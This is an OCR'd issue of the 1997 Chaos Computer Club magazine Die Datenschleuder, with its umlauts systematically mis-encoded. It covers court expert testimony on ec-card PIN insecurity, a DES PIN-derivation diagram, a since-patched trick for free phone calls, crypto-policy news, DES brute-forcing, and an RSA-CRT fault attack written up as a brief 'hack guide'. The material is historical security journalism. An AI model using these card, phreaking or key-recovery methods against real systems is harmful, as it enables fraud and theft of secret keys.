VortŠuschung einer Straftat annehmen mu§.
Bereits fŸr 49,50 DM bietet in bekannter
Elektronik-Handel Codierstationen aus DDRBestŠnden (Anlage 3).Mit diesen(fabrikneuen)
GerŠten kšnnen Magnetkarten hergestellt,
dupliziert, manipuliert und gelesen werden.
Die zugehšrige Software ist als ausfŸhrliches
Listing in einer Elektronikzeitschrift
veršffentlicht worden (Bl 24 ff d.A.) Was jede
Stelle der Magnetspur einer ec-Karte
bedeutet, kann man in einer Hackerzeitung
nachlesen (Bl. 19 d.A. sowie Anlage 4), wenn
man nicht Zugang zu einer DIN/ISO 4909
hat.
†ber die notwendigen EingangsqualiÞkationen verfŸgen mindestens alle ComputerFreaks, Technik- und Informatikstudenten.
Die ãVorleistungsinvestitionenÒ scheinen
nicht unŸberwindlich. Man darf deshalb ein
ausreichendes TŠterpotential vermuten.
6. Beantwortung der Beweisfragen
Es wurde in der Analyse mehrere
Mšglichkeiten aufgezeigt, wie unberechtigte
TŠter in kŸrzester Zeit Kenntnis einer PIN
erlangen kšnnen. Das Gericht mšge
bewerten, ob eine der vorgestellten Methoden
in diesem Rechtsstreit mit Ÿberzeugender
Wahrscheinlichkeit angewandt worden sein
kann. Wegen der Unmšglichkeit einer
forensischen Untersuchung der Magnetkarte
kšnnen durch den SachverstŠndigen nur die
unter den gesicherten UmstŠnden technisch

EC-Karten Unsicherheit
unmšglichen Methoden ausgesondert
werden. Bei den Ÿbriggebliebenen kann der
SachverstŠndige weder eine Mšglichkeit
ausschlie§en noch beweisen.
Frage:
a) Unter welchen Vorraussetzungen und mit
welchem zeitlichen Aufwand lŠ§t sich die
PIN einer gestohlenen ec-Karte von einem
TŠter ermitteln?
Antwort:
Da der KlŠger angibt, seinen PIN-Brief sofort
nach Empfang vernichtet zu haben und auch
die PIN inzwischen vergessen und niemals
einen Geldausgabeautomaten benutzt zu
haben, scheiden alle Mšglichkeiten einer
AusspŠhung aus.
Denkbar bleiben somit die Mšglichkeiten
einer Ermittlung der PIN (1), einer
Manipulation der Magnetkarte (2) oder eines
Systemfehlers (3) in Form eines
Programmfehlers (ãBetriebssystemÒ) bzw.
aufgrund der ãBetriebsartÒ (online/ofßine).
zu 1:
Wegen der langen Zeit seit Versendung des
PIN-Briefes an den KlŠger ist Mšglichkeit des
Abfangens dieses Briefes auf dem Postweg
nahezu ausschlie§en.
Bei der empirischen Ermittlung der PIN
durch Ausprobieren ist die hšchste
Erfolgswahrscheinlichkeit mit 1:150 anzunehmen.
Wie im Rahmen der Risikoanalyse dargelegt,
ist die Wahrscheinlichkeit einer rechnerischen
Ermittlung der PIN nach der Methode ãBrute
Force AttackÒ oder ãSmart AttackÒ geringer.
Es kann aber nicht mit letzter Sicherheit
ausgeschlossen werden, da§ es noch andere,
effektivere rechnerischer Methoden zur
Ermittlung der PIN gibt, von denen der
SachverstŠndige zur Zeit noch keine Kentnis
hat.
Setzt man vorraus, da§ auch
Systemkomponenten aus einem (geraubten)
GAA verwendet worden sein kšnnten, so ist
die schnelle und richtige Ermittlung der PIN
zur Karte des KlŠgers nicht von der Hand zu
weisen. Dieser Methode ist in Anbetracht der

TatumstŠnde von allen bekannten Varianten
die hšchste Wahrscheinlichkeit zu
unterstellen.
zu 2:
Die Magnetkarte der KlŠgers kann auch mit
Produktionsfehlern behaftet gewesen sein,
die die Eingabe einer beliebigen PIN
erlauben. Ein solches Verhalten ist in
mehreren aufgetretenen FŠllen dokumentiert,
so da§ es auch in diesem Fall nicht
ausgeschlossen werden kann. Es ist fŸr die
Beurteilung von hypothetischem Wert, ob das
Verhalten als Karten- oder Programmfehler
angesehen wird. DarŸber hinaus kšnnen die
entwendete ec-Karte des KlŠgers auch von
dem TŠter mit diesem Ziel verŠndert worden
sein. Da die Karte aber nicht forensisch untersucht werden kann, bleiben alle Aussagen
Vermutungen.
Weil aber auch keine Transaktionsprotokolle
und Protokollstreifen der GAA / POS
vorgelegt wurden, lŠ§t sich nicht feststellen,
ob die PIN Ÿberhaupt im Rahmen der
unberechtigten Abhebungen geprŸft worden
ist.
Wegen der derzeit nicht mšglichen
Auswertung der entwendeten ec-Karte des
KlŠgers kann auch nicht Ÿber die Historie der
Verwendung dieser Karte festgestellt werden.
zu 3:
Selbst wenn zur Tatzeit ein Programmfehler
in der Systemsoftware der Beklagten nicht
vorhanden war, lŠ§t sich dieser heute nicht
mehr feststellen, weil die Beklagte nach der
Erfahrung des SachverstŠndigen auch
gerichtsbeauftragten Externen kategorisch die
Information hierŸber verweigert.
Die Frage nach der Betriebsart des
Zahlungssystems der Beklagten zum
Tatzeitpunkt kann der SachverstŠndige
derzeit nicht beantworten, weil die
vorgelegten KontoauszŸge hierŸber nicht
aussagen. Erst nach PrŸfung der relevanten
Transaktionsprotokolle und der
Kontrollstreifen der betroffenen GAA und
POS kšnnen hierzu gutachterliche
Feststellungen getroffen werden.
Frage:

Die Datenschleuder
Nummer 59, Juni 1997

Gutachten 9422/03
b) Ist es dabei denkbar, da§ ein TŠter diese
innerhalb von 30 Minuten herausÞndet, gegebenenfalls mit Hilfe von Erkenntnissen aus
einschlŠgigen Vortaten, um welche
Vorkenntnisse m٤te es sich dabei handeln?
Antwort:
Zum Zeitbedarf wurde bereits die Antwort
gegeben: Es ist denkbar, da§ ein TŠter die
PIN einer gestohlenen ec-Karte innerhalb von
30 Minuten herausÞndet.
Wenn man Vorkenntnisse aus einschlŠgigen
Vortaten unterstellt, so m٤ten diese nach
Lage der TatumstŠnde mittels
Systemkomponenten durchgefŸhrt worden
sein, wenn nicht ein dem SachverstŠndigen
derzeit unbekanntes Berechnungsverfahren
zur PIN-Ermittlung eingesetzt worden ist.
Mit geringerer Wahrscheinlichkeit ist
anzunehmen, da§ der TŠter lediglich mit
tieferem Wissen um die AblŠufe im
Zahlungsverkehr zum Erfolg gekommen ist.
Allerdings deutet der Umstand der dreisten
Barabhebungen auf fundiertes (Insider)
Wissen im automatisierten Zahlungsverkehr
hin. <...>
(1) Markus Kuhn: PIN auf EC-Karten knacken? /
06.08.1996 <4pcnuq$4e9@cortex.dialin.rr-ze.unierlangen.de>
(2) Ulf Moeller: Sicherheit von ec-Karten / 28.06.1996
http://www.c2.net/~um/faq/pin.html
(3) Die Datenschleuder - Das wissenschaftliche
Fachblatt fŸr kreative Techniknutzung. Ein Organ des
Chaos Computer Club, Nr. 53 von Dezember 1995,
ISSN 0939-1045
(16) DIN/ISO 4909 und Regelwerk des Zentralen
Kreditausschusses
(19) AG Kšln 116 Js 599/89
(21) Zentraler Kreditausschu§: Anhang 3 zu den
Richtlinien fŸr das deutsche ec-Geldautomatensystem
i.d. F.v. 01.01.1995, S. 28
(22) Siegfried Herda: Gutachten zur Sicherheit von ecKarten mit Magnetstreifen
fŸr LG Kšln Az.: 1 1 S 338/92, Februar 1994
(23) Michael J. Wiener: EfÞcient DES Key Search, BellNorthern Research Ottawa 20. August 1993
(24) Balze, DifÞe, Rivest, Schneider, Shimomura,
Thompson, Wiener: Minimal Key Lengths for
Symmetric Ciphers to provide Adequate

Die Datenschleuder
Nummer 59, Juni 1997

(25) Manfred Pausch: Gutachten fŸr AG Darmstadt 38
C 4386/87, 10.07.1988
(26) Ivar Kamsvag: Slik kan en minibank knekkes
Computerworld Norge, 1/1993 S. 4-5, 15.01.1993
(27) NDR Ratgeber Technik: Archiv Ammann,
Lehnhardt, Leptihn
(28) Westdeutsche Allgemeine Zeitung: Geldautomat
kopiert den Magnetstreifen, 12.01.1996
(29) Bundeskriminalamt, Kriminalistisches Institut,
Ref. Kl 12: ComputerkriminalitŠt 1995 in der
polizeilichen Kriminalstatistik (PKS):
Gesamtdeutschland.
Anmerkungen der Redaktion:
- Eingabe des PIN-Codes auf Touchscreen bei GAA:
z.B. Citibank (Quelle: Pausch bei Vortrag in Hamburg
auf dem a«la Card-Forum)
- Ofßine-Zeiten der GAA sind z.B. auch durch
Umbuchung der technischen auf die juristischen
DatenbestŠnde bedingt, wie etwa bei der Deutschen
Bank zwischen 22 und 7 Uhr (Batchbetrieb, auch kein
Zugriff auf Kontostandsdrucker) (Quelle: KundenBeobachtung ++)
- ãHardware-Sicherheits-ModulÒ : gemeint ist z.B. der
DALLAS DS5002FP, ein HochsicherheitsMicrokontroller mit BUS-VerschlŸsselung, der von
Markus Kuhn vollstŠndig geknackt wurde. Befehlssatz
ist 8031 kompatibel. (Quelle: Nachricht in de.org.ccc
von Michael Holztl, kju@sauerland-online.de)
- die Hinweise auf auf die Entwendung eines solchen
Moduls und dem kriminellen Einsatz in der BRD
(Pausch in Hamburg: ãRegion BerlinÒ) entstammen
Christian Zimmermanns Buch ãDer HackerÒ, das
bezŸglich seiner InformationsgŸte als oberߊchlich
und undifferenziert und teilweise sachlich falsch zu
bezeichnen ist. Der Autor Christian Zimmermann ist
u.a. als einer der Drahtzieher der ãTelekom-AffŠreÒ um
Ÿberhšhte Telefonrechnungen unschuldiger Kunden
der Redaktion bekannt, verursacht durch
Manipulationen (Dialer etc.) an Telekomleitungen zum
Zwecke des Supporting von Auslands (ãSexÒ) und
0190-Nummern. Insofern sind seine Aussagen als
ãHackerÒ unglaubwŸrdig, seine kriminellen
Intentionen und Kontakte jedoch als glaubwŸrdig einzustufen.

EC-Karten Unsicherheit
Ermittlung der PIN
Bankleitzahl
12345678

Konto-Nummer
1234567890

4567812345678901

Kartenfolgenummer
1

zu verschlüsselnde Dezimalzahl

Wandlung in Binärzahl

56 Bit geheimer Schlüssel

DES

Ergebnis des DES-Verfahrens:
Inst.-Schl. 1D375AF548B34C48
Pool-Schl. 2FD5B2FF3A4827FF

ja

Vom Ergebnis werden 3.-6.
Stelle fŸr PIN ausgewŠhlt.

nein
Institutskarte?

375A

Ergebnis mit
Institutsschlüssel

Ergebnis mit
Poolschlüssel

D5B2

Offset wird bei
Poolschl. addiert

0248

Wandlung von Hex zu Dezimal nach Modulo 10

PIN 3750

Die Datenschleuder
Nummer 59, Juni 1997

OVst-Watch
Pannen bei Software-Updates

Neue EWSD-Features

Bei der Einspielung der neuen
Vermittlungsstellen-Software Anfang April
stŸrzten die SEL-Ortsvermittlungsstellen am
8.4.97 in NŸrnberg und MŸnchen erstmal
ganz ab. In anderen Ortsnetzen wurden
Netzansagen (z.B. ãKein Anschlu§ unter
dieser NummerÒ) nicht mehr korrekt wiedergegeben, Makeln funktionierte nicht mehr
und einigen Teilnehmern wurde eine nicht
abschaltbare Umleitung auf die T-Net-Box
aktiviert.

Auch die Siemens-Vermittlungsstellen
(EWSD) erhielten kŸrzlich neue Software.
Unter anderem wurde eine Art ãAnti-ScanÒVerhalten in Bezug auf */#/A/B/C/DKombinationen eingebaut. So reagiert die Vst
jetzt wesentlich toleranter auf ãversehentliche
FalscheingabenÒ bei Steuersequenzen (*xxx,
#xxx, *#xxx). Neu hinzugekommen
gegenŸber dem vorigen Release sind *34#
und *35# (bzw. #34#/*#34#/#35#/*#35#),
die wahrscheinlich eine Auswahl der Art der
Anrufsperre durch den Teilnehmer
ermšglichen sollen. Bisher konnte man mit
*33# nur einen vorher festgelegten Typ (z.B.
Auslands- oder Vollsperre) aktivieren. Schon
seit der letzen Version gibt es *37# (RŸckruf
bei besetzt auch fŸr analoge AnschlŸsse) und
*31# und *22# (Funktion unbekannt, wei§
jemand genaueres?).
Ein eher nervendes Feature wurde mit
diesem Update der Anrufweiterleitung zuteil:
Der Anrufer hšrt, wenn er einen Anschlu§
anruft, der umgeleitet wird, die Ansage ãWir
verbinden weiterÒ. Somit entfŠllt die
Mšglichkeit, Anrufe diskret umzuleiten.

T-Net-Box
Die T-Net-Box ist der Anrufbeantworter im
Netz der Telekom. Von den meisten
AnschlŸssen an digitalen Vermittlungsstellen
(S12/EWSD) kann dieser inzwischen Ÿber die
0130/144770 eingerichtet werden. Allerdings
sollte man vorher sicherstellen, da§ man - im
Falle eines ISDN-Anschlusses - Ÿber
Anrufweiterschaltung verfŸgt, bzw. bei nichtISDN die zugehšrigen Steuersequenzen
freigeschaltet sind (*xxx#: Umleitung auf TNet-Box aktivieren, wobei fŸr xxx gilt: 000 alle Anrufe auf den Anrufbeantworter
umleiten, 555 - bei besetzt, 888 - nach 15
Sekunden klingeln. Mit #xxx# wird die jeweilige Umleitung deaktiviert). †brigens ist das
T-Net-Box-System noch mindestens bis zum
31.7. im Test-Betrieb. Dieser sollte zwar zum
1.6. beendet sein, mu§te jedoch wegen
Software-Problemen verlŠngert werden.
Bevor man diesen Netz-AB einem
herkšmmlichen vorzieht, sollte man jedoch
beachten, da§ die *T*** damit theoretisch
Zugriff auf alle eingegangenen Nachrichten
hat.
Weitere Informationen zur T-Net-Box gibt es
als Faxabruf-Dokument unter 0228/1819657
oder bei den freundlichen Hotline
Mitarbeitern unter 0130/141414.

Bugs
Mit der neuen EWSD-Software verschwand
auch ein sehr beliebter ISDN-Bug: FŸr alle
AnschlŸsse an Siemens-Vsts gibt es eine
Nummer, mit der man begrenzt
LeitungsqualitŠt und Funktion des
Anschlusses prŸfen kann (z.B. Berlin:
01177555+<eigene Nummer>). Wenn man
jedoch 01177555+<eben nicht eigene, sondern
eine andere Nr. in der selben Vst> wŠhlte,
und zwar so, da§ ein Teil dieser Nummer in
Blockwahl (mehrere Ziffern werden gleichzeitig zur Vst geschickt, z.B. durch Wahl bevor
man den Hšrer abnimmt) und der andere Teil
einzeln Ÿbermittelt wurde, hatte man eine
Verbindung zu diesem Anschlu§ gebŸhrenfrei (wie grundsŠtzlich alle
Verbindungen zu Nummern, die mit 0117
beginnen).
tobias@ccc.de

Die Datenschleuder
Nummer 59, Juni 1997

Krypto-News
mšglichst noch vor der Sommerpause eine
Direktive an die MitgliedslŠnder zur
EindŠmmung illegaler
EntschlŸsselungstechnik auszugeben.
DarŸber hinaus sollen sich auch
Privatpersonen strafbar machen, die illegale
EntschlŸsselungstechnik benutzen oder besitzen. Durch ein derartiges Gesetz entstŸnde
eine gefŠhrliche technische Grauzone in der
Strafbarkeit, weil damit letztlich alle
leistungsfŠhigen frei programmierbaren
Computer illegal werden.
Der Kosten/Nutzen-Aufwand zum Knacken
von Eurocrypt betraegt fŸr einen Geheimdienst mit Budget 300 Millionen US-Dollar ca.
zwšlf Sekunden, bei einem
Grossunternehmen mit 10 Mio$ Budget etwa
sechs Minuten (es heisst, der BND habe zwei
solcher Maschinen) und bei einer Investition
von nur 400 Dollar 38 Jahre.
<Zahlen schon nicht mehr aktuell, d. Setzer>
Wau Holland fuer eMailPress, die agentur gegen
den strich...emp@NADESHDA.gun.de
Alte Welt bangt und zappelt

Gesetze gegen Codeknacker geplant

(emp) 06.06.97 - Eine europaweite
Gesetzgebung gegen sogenannte
ãFernsehpiraterieÒ rŸckt nŠher. Weil nicht
zuletzt durch den Einßuss der kryptofeindlichen Franzosen bei der Eurocrypt-Norm ein
ãschwachesÒ VerschlŸsselungsverfahren (DES
mit nur 56 Bit) gewŠhlt wurde, sind
Codeknacker bei der EntschlŸsselung von
Pay-TV-Fernsehprogrammen oft erfolgreich.
Statt starke VerschlŸsselungsverfahren
zuzulassen, soll jetzt sogar der Besitz von
Computern kriminalisiert werden, wenn sie
geeignet zum Codeknacken sind. Der Bericht
fordert Strafgesetze gegen Personen und
Unternehmen, die ohne Autorisierung GerŠte
und EntschlŸsselungssoftware herstellen, verbreiten oder verkaufen. 422 Abgeordnete des
Europaparlamentes stimmten am 13. Mai
1997 in Strassburg dem ãAnastassopoulosBerichtÒ zu, bei sechs Gegenstimmen und
sechs Enthaltungen. Das Parlament
beauftragte die EuropŠische Kommission,

Deutscher Bundestag
Drucksache 13/7753

13. Wahlperiode 22.05.97
Antwort der Bundesregierung auf die Kleine
Anfrage des Abgeordneten Dr. Manuel
Kiper und der Fraktion B†NDNIS 90/DIE
GR†NEN - Drs. 13/ 7594
Lage der IT-Sicherheit in Deutschland
47.Welcher Aufwand ist nach Kenntnis der
Bundesregierung nštig, um mit asymmetrischen
Verfahren verschlŸsselte Daten mit
SchlŸssellŠngen von 40, 56 und 128 Bit zu
entschlŸsseln und wie gross ist nach
Auffassung der Bundesregierung die fŸr eine
VerschlŸsselung sensitiver Daten hinreichende
SchlŸssellŠnge fŸr eine - auch Ÿber die nŠchsten
fŸnf Jahre - sichere †bermittlung?
Unter der Voraussetzung, dass fŸr ein
symmetrisches Verfahren keine andere
Analysemethode bekannt ist als die
vollstŠndige Absuche des SchlŸsselraumes,
lassen sich die nachstehenden Aussagen
treffen:

Die Datenschleuder
Nummer 59, Juni 1997

* 40-Bit-Verfahren kšnnen - allerdings mit
hohem zeitlichen und apparativen Aufwand
mittels Hochleistungsrechnern oder auf dem
Wege des ãverteilten RechnensÒ entziffert
werden. Die genaue Hšhe des Aufwandes ist
verfahrensabhŠngig.
* 56-Bit-Verfahren erfordern zu ihrer
Entzifferung den Einsatz vonSpezialrechnern,
die eigens zu diesem Zweck konstruiert
werden mŸssen. Bei deren entsprechender
Dimensionierung lŠsst sich der zeitliche
Aufwand auf die Groessenordnung von
Stunden begrenzen.
* Die vollstŠndige Absuche eines 128-BitSchlŸsselraums entzieht sich jeder heute und
in absehbarer Zeit verfŸgbaren
Rechentechnik.
Ab einer SchlŸssellŠnge von etwa 80 Bit kann
- bei ansonsten entzifferungsresistentem
Design - die Mšglichkeit einer Analyse
durch Absuche des SchlŸsselraums fŸr
die Ÿberschaubare Zukunft, insbesondere der
nŠchsten fŸnf Jahre, ausgeschlossen werden.
Verteilte brute force attacke auf DES

DES noch nicht tot, stinkt aber schon
Am 19. 6.1997 war es soweit: erstmals in der
Geschichte hat eine nicht-geheime
Organisation einen DES-SchlŸssel durch
brute force geknackt. Von der Firma RSA
wurden $10.000 Preisgeld und ein
Plaintext/Ciphertext-Paar bereitgestellt,
insgesamt wurden von mehreren tausend
Teilnehmern in zwei ueber das Internet
koordinierten Gruppen (eine fuer die USA,
eine fuer den Rest) ungefaehr 50% des
Schluesselraums durchsucht, und es wurden
nach vorsichtigen Schaetzungen 447.000
MIPS-Jahre verbraten. Damit geht dieser
Hack als groesste verteile Berechung in die
Geschichte ein.
andreas@ccc.de

Die Datenschleuder
Nummer 59, Juni 1997

USA-Regulierungen

Kontrolleinschränkungssimulation
The US government will announce later
today that will soon lift controls on
technology crucial to doing business over the
Internet, White House advisor Ira Magaziner
said yesterday evening.
Under plans expected to be outlined at a
noontime press brieÞng today, the federal
government will require that producers of
specialized, narrowly focused data
scrambling products submit only to one-time
government approval before they sell
powerful encryption products abroad.
Current policy requires case-by-case approval
in most instances.
ãBasically it will say that for basic Þnancial
and electronic applications there will be no
export restrictions and no requirement for
key recovery,Ò Magaziner said.
US Undersecretary of Commerce William
Reinsch is expected to give details of the plan.
Reinsch could not be reached for comment.
Computer industry executives and public
interest groups said the new arrangement,
though far short of deregulating all
encryption, was a step in the right direction.
ãThis is evidence that the administration acknowledges that manufacturers of foreign

Krypto-News

encryption products do exist,Ò said Peter
Harter, public policy counsel at Netscape
Communications Corp. ãTheir policy has put
American industry in the back seat and now
were trying to catch up.Ò David Banisar,
policy analyst at the Washington-based
Electronic Privacy Information Center, called
the move a ãsmall step forward.Ò
Nonetheless, ãit still doesn’t reach the needs
for secure e-mail or other purposes,Ò he said.
Computer software and hardware eligible for
decontrol under the proposed regulations
must Þt several criteria, said Kawika Daguio,
a public affairs specialist with the American
Bankers Association who helped hammer out
an agreement for the new regulations.
.Though products designed for use by the
general public may be unlimited in the
strength of the encryption techniques they
employ, they must also be strictly limited in
use, he said. Software written for home
banking, for instance, must be usable only for
bank transactions and not easily modiÞed for
general use. Most programs handed out by
banks for PC banking at home Þt that criteria,
he said.
Programs that use the industry SET standard
for credit card purchases over the Internet
should easily meet Commerce Department
criteria, too, since the SET standard encrypts
only those data essential to making online
purchases; the limited uses of the standard

render it all but useless for general use. Visa,
MasterCard and American Express developed
the standard. ãI«d expect programs written
the SET to get very rapid approval - within
weeks,Ò Daguio said.
In addition, US companies will have leeway
to export any kind of encryption to any bank
as long as that encryption is used only for
legitimate, internal bank functions. Products
designed for merchant-to-merchant
transactions without a bank in between
would still be subject to stricter controls,
including use of weak software routines that
make decoding by law enforcement easy, or
deposit of decoding keys with law
enforcement bodies prior to export.
Commerce Department regulations will spell
out details this month or next, Daguio said.
Though more sweeping in nature than past
government regulations, the US banking
industry has long enjoyed more freedom to
use powerful encryption technologies abroad
than other industries. Successive
administrations have granted banks that
leeway since by deÞnition they must have
greater safeguards over employee behavior
than all but a handful of industries. In addition, Þnancial applications have long been
easier to design for export since they typically
require encryption of only a few standard
data Þelds. If sufÞciently limited in design,
the reasoning goes, they pose no threat to law
enforcement concerned about smugglers or
terrorists who may want to evade detection
by law enforcement. The government and the
computer industry have for years been locked
in disputes over the relative importance of
encryption technologies and their potential
for misuse. [...]
Absent US encryption exports, they claim,
American companies will soon lose their
leadership role in a technology crucial to the
country’s competitiveness.
Federal ofÞcials, on the other hand, have said
export of the technology threatens global
security, since terrorists and criminals in
outlaw states like Libya and North Korea
could easily use the technology to defeat
wiretaps and data searches increasingly
prized by law enforcement and national secu-

Die Datenschleuder
Nummer 59, Juni 1997

rity agencies. In response, they demand that
exports of powerful encryption include socalled key recovery - a method by which law
enforcement can gain access to the encryption
keys used to encode messages. Many public
interest groups have condemned the plans,
however, saying such a transfer of power to
law enforcement threatens to usher in an era
of ubiquitous and illegal eavesdropping.
Several bills pending in Congress would do
away with nearly all controls. Reinsch was
expected to testify at congressional hearings
on one of the bills this morning.
By Will Rodger /Washington Bureau Cheif
Inter@ctive Week

These ãnewÒ regulations ãto be issuedÒ are
scrambling to catch up with previous and
current practices...

It doesn’t change things at all.

When they issued the new export regulations
in January, the glaring hole was the absence
of an explicit exception for the Þnancial industry. Under the customs that evolved around
ITAR, you could get an export license for
strong crypto as long as the overseas
customer was a Þnancial institution. This
announcement is simply a public
acknowledgment that the BXA will look
favorably on export requests to banks and
that someday theyÕll try to draft speciÞc regulations on the subject. Meanwhile you do it
by grinding through the bureacracy. Export
permission for strong crypto that only
encrypts Þnancial data is clearly a variant of
this tradition. They already granted export
permission for one vendor of such a system,
so IÕm not surprised theyÕre planning to make
up a regulation to cover it.
Rick. smith@securecomputing.com

PGP darf exportiert werden

Pretty Good Privacy, hat vom US-Handelsministerium die Erlaubnis bekommen, da§
das Produkt nun auch mit der 128-BitVerschluesselungstechnologie ofÞziell
exportiert werden darf.
30.05.97 Horizont Newsline

Die Datenschleuder
Nummer 59, Juni 1997

In letzter Minute: Amis drehen doch noch durch

ALERT: Senate to vote on mandatory
key escrow as early as Thu June 19!
On Tuesday June 17, Senators John McCain (R-AZ) and
Bob Kerrey (D-NE) introduced legislation which would
all but mandate that Americans provide guaranteed
government access to their private online
communications and stored Þles. The bill, known as
ãThe Secure Public Networks Act of 1997Ò (S.909)
represents a full scale assault on your right to protect
the privacy and conÞdentiality of your online communications. Though offered on Capitol Hill as a compromise, the McCain-Kerrey bill is virtually identical to
draft legislation proposed earlier this year by the
Clinton Administration while doing nothing to protect
the privacy and security of Internet users. The bill
closely mirrors draft legislation proposed by the
Clinton Administration earlier this Spring. SpeciÞcally,
the bill would:
* Compel Americans to Use Government-Approved
Key Recovery Systems * Make Key Recovery a
Condition Of Participation in E-Commerce * Allow
Government Carte Blanche Access to Sensitive
Encryption Keys Without a Court Order * Create New
Opportunities for Cybercrimes * Codify a low 56-bit
Key Length Limit on Encryption Exports * Create
Broad New Criminal Penalties for the Use of
Encryption. The full text of the bill, along with a detailed analysis, is available online at
http://www.cdt.org/crypto/

Abt. wundersame Dinge
Fehler & Folgen

RSA(CRT): One strike and you’re out!
Manchmal sind es die berŸhmten
Randbemerkungen, die kryptographische
Erdbeben auslšsen sollten. Speziell wenn diese Randbemerkung zwei Tage nach einer
wichtigen Veršffentlichung von Arjen Lenstra
kommt. Lenstra ist nicht nur einer der
HackervŠter von digicrime, sondern auch
promovierter Mathematiker und einer der
fŸhrenden Faktorisierungsforscher. Wenn die
Wissenschaftler von Bellcore in ihrem
berŸhmten Artikel ãOn the Importance of
Checking Cryptographic Protocols on FaultsÒ
also eine Mail von Lenstra zitieren, ist
sicherlich Aufmerksamkeit angesagt.
Aber irgendwie scheint es mal wieder
niemanden zu interessieren, was sich
Hacker/Mathematiker da Ÿberlegt haben.
Dabei ist die Sache hšchst brisant: EINE
durch Hardwarefehler unkorrekte RSAUnterschrift fŸhrt mit fast 100%-iger
Sicherheit zur Aufdeckung des geheimen
RSA-SchlŸssels. Der ãAngreiferÒ bekommt
die Mšglichkeit direkt angezeigt, und die
Berechnung ist trivial.
Um es wissenschaftlich exakt zu formulieren:
Entsteht ein Fehler wŠhrend des Signierens,
tritt er mit hoher Wahrscheinlichkeit zum im
Fehlermodell angenommenen Zeitpunkt auf.
Er kann als beliebiger Bitfehler angenommen
und mit sehr hoher Wahrscheinlichkeit kann
das RSA-Modul N mit einem Aufwand von
einer Potenzierung mit dem šffentlichen
Exponenten, einer Addition und einer GGTBlidung faktorisiert werden.
Aber der Reihe nach:
Durch einen altbekannten mathematischen
Trick kann man die fŸr das RSA-Verfahren
notwendige, aufwendige Potenzierung stark
beschleunigen. Statt die RSA-Signatur
E=m^d MOD N
direkt modulo N zu berechnen, rechnet man
die beiden Werte
E[p] =m^d MOD p und E[q]=m^d MOD q,
wobei p und q die beiden Primfaktoren von
N sind.

Nach dem Chinesischen-Restsatz (Chinese
Remainder Theorem) existieren nŠmlich zwei
einfach und nur einmal im voraus
bestimmbare Werte a und b mit
a = 1 MOD p, a = 0 MOD q bzw b = 0 MOD
p, b= 1 MOD q.
Mit diesen beiden Zahlen gilt
E=aE[p]+bE[q] MOD N.
Diese ist offensichtlich deutlich efÞzienter alsdie direkte Potenzierung modulo N, da die
Operationen mit deutlich kŸrzeren Zahlen
durchgefŸhrt werden kšnnen. Bruce Schneier
empÞehlt in seinem Standardwerk
ãAngewandte KryptographieÒ (1996) dieses
Vorgehen und auch die RSAREF-Referenzimplementierung von RSASDI und PGP
verwenden das CRT. Sind p und q ungefŠhr
gleich gro§, halbiert sich ungefŠhr die LŠnge
der Zwischenergebnisse. Dies ist natŸrlich
fŸr Chipkarten mit beschrŠnktem
Speicherplatz von ganz besonderem Vorteil.
Die Signaturzeit wird nach Angaben der
Chipkartenhersteller mindestens halbiert.
FAMEX -Zahlen aus einem Philipsprospekt
(Mai 1997)
SchlŸssel-Bits, 512, 768, 1024, 2048
Straightforward (ms), 140, 410, 805, 18200
Chinese Remainder (ms), 56, 164, 322, 2156
Gehen wir nun davon aus, da§ entweder bei
der Berechnung von E[p] oder von E[q] ein
Fehler auftritt. Diese Annahme ist, da diese
Berechnungen die zeitlich aufwendigsten
Abschnitte des Algorithmus sind, sehr
realistisch. Nun ist mit hoher
Wahrscheinlichkeit N kein Teiler von (MF^e), wobei e der zur VeriÞkation der
Signatur benštigte šffentliche Exponent ist.
Dann gilt aber
GGT(M-F^e,N)=q.
Somit kann man den RSA-Modul N(=pq) faktorisieren und so einfach den geheimen
SchlŸssel d berechnen. Kurz gesagt ist das
der kryptographische Super-GAU.
Witzig dabei ist, da§ der einfache Anwender,
der zur Kontrolle der Signatur M=E^e
ausrechnen mu§, direkt auf den Fehler hingewiesen wird.

Die Datenschleuder
Nummer 59, Juni 1997

ROTFLBTCDICAJTTWADBSIHPWTRHITSBKABAYB
„Rolling On The Floor Loughing, Biting The Carpet, Dancing In Circles And Jumping Through The Window Almost
Dieing By Smashing Into HP Who’s Then Running Horrified Into The Street Being Killed Accidentally By A Yellow
Bulldowzer“
(de.org.ccc/10.06.1997/kraxel@felix.intern)

In der Orginalarbeit von Dan Boneh, Richard
DeMillo und Lipton vom 26. September 1995
gingen die Autoren noch davon aus, da§ fŸr
ihren Angriff eine korrekte UND eine fehlerhafte RSA-Signatur der selben Nachricht M
von Nšten sind. Hier traten dann die professionellen Abwiegler auf den Plan. Durch
ErgŠnzung der Nachricht (beispielsweise mit
Zeitstempeln) wŸrde schon seit lŠngerem
erreicht, da§ niemals die gleiche Nachricht
zweimal unterzeichnet wird. Wenn nur eine
fehlerhafte Unterschrift benštigt wird, hilft
dies zunŠchst nichts. Allenfalls durch das
HinzufŸgen von Zufallszeichen (random
padding) aus einem kryptographisch starken
Zufallsgenerator, kann, da dann die eigentlich
unterschriebene Nachricht MÕ nicht bekannt
ist, der Lenstra-Angriff verhindert werden.
Dies bedarf aber mšglicherweise einer
Protokollanpassung und weiterer Forschung.
Bis dahin mu§ das nochmalige VeriÞzieren
der Signatur vor der Ausgabe dringend empfohlen werden. Bei der gro§en Chipkartenkonferenz ãTechnologie Ô97Ò Mitte Juni
interessierte sich leider so gut wie keiner der
Experten fŸr diese SicherheitslŸcke.
Um es nochmals festzuhalten:
Entsteht zufŠllig, durch von Hackerhand hinzugefŸgten physikalischen Stre§ oder einen
INDEL-Prozessor, eine fehlerhafte RSA
Ausgabe, kann mit einem 8080 und ein paar
Millisekunden der geheime RSA-SchlŸssel
bestimmt werden.
Also fŸr alle noch mal die Hackanleitung:
Wenn einem eine fehlerhafte RSA-Unterschrift
F prŠsentiert wird, einfach mal GGT(M-F^e,
N) ausrechnen. Fast sicher hat man dann
einen Faktor des RSA-Moduls gefunden.
Wenn man dann noch einen kurzen Blick in
ein beliebiges Kryptographiebuch zur Bestimmung des geheimen SchlŸssels d aus p und q
wirft, dŸrfte man einen Hauptgewinn
gemacht haben.
RŸdiger Weis, ruediger.weis@rz.uni-mannheim.de
www.informatik.uni-mannheim.de/~rweis/ rsacrt/

SET auch durch

The security protocol for safeguarding creditcard transactions on the Internet may have to
be changed because the underlying
cryptography is too easy to decode and too
difÞcult to upgrade. Steve Mott, senior vice
president of electronic commerce and new
ventures for MasterCard International, said it
could take hackers as little as a year to break
the industryÕs standard encryption code,
which is supposed to render credit-card numbers unreadable to outsiders on the Internet.
